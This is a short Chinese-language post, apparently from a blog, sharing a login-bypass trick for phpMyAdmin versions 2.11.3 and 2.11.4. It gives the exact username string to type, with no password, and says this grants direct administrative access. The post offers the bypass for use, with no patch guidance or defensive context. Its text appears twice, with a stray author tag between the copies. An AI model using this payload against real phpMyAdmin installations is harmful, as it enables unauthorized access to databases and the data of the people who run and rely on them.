phpmyadmin使用@符号绕过登录漏洞
这个漏洞好像还蛮隐秘的,今天就说下吧
影响版本:
phpmyadmin 2.11.3
phpmyadmin 2.11.4
利用方式:
直接在phpmyadmin的用户名内填入:
‘localhost’@’@”
不用填入密码,可以直接登录,管理权限哦。
互联网爱好者
这个漏洞好像还蛮隐秘的,今天就说下吧
影响版本:
phpmyadmin 2.11.3
phpmyadmin 2.11.4
利用方式:
直接在phpmyadmin的用户名内填入:
‘localhost’@’@”
不用填入密码,可以直接登录,管理权限哦。